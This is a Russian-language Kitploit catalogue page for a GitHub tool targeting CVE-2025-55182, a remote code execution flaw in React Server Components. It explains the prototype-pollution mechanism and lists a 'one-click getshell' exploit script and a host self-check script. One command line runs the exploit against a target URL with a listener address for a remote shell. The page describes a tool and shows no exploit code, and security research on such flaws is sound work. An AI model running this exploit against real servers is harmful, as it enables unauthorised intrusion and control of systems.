Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sun977/cve-2025-55182
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubsun977/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 检测方式和攻击利用

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 RCE

Инструмент для самопроверки, используется для проверки уязвимости CVE-2025-55182

Принцип уязвимости

React Server Components при декодировании полезной нагрузки, отправляемой на конечные точки серверных функций, содержат дефект разрешения пути. Путем разделения свойств объекта двоеточием реализуется вложенный доступ (например, $1:a:b соответствует {"a":{"b":"foo"}}.a.b), но не проверяется существование свойства. При передаче $1:a:a происходит невалидный доступ {}.a.a, что вызывает ошибку 500 на стороне сервера; злоумышленник, создав специальную полезную нагрузку, может использовать загрязнение прототипа и внедрение кода для достижения RCE.

Описание каталогов

  • exp.py – эксплуатационный код уязвимости (однокнопочный getshell)
  • cve-2025-55182-check.sh – инструмент самопроверки хоста на уязвимость

Метод эксплуатации

root@kitploit:~
python3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444

Метод самопроверки

root@kitploit:~
CVE-2025-55182-Check.sh [-h] [-f <path>] [-a]

Отказ от ответственности

Данный инструмент предназначен только для исследований в области безопасности. Не используйте его в незаконных целях.

Скачать инструмент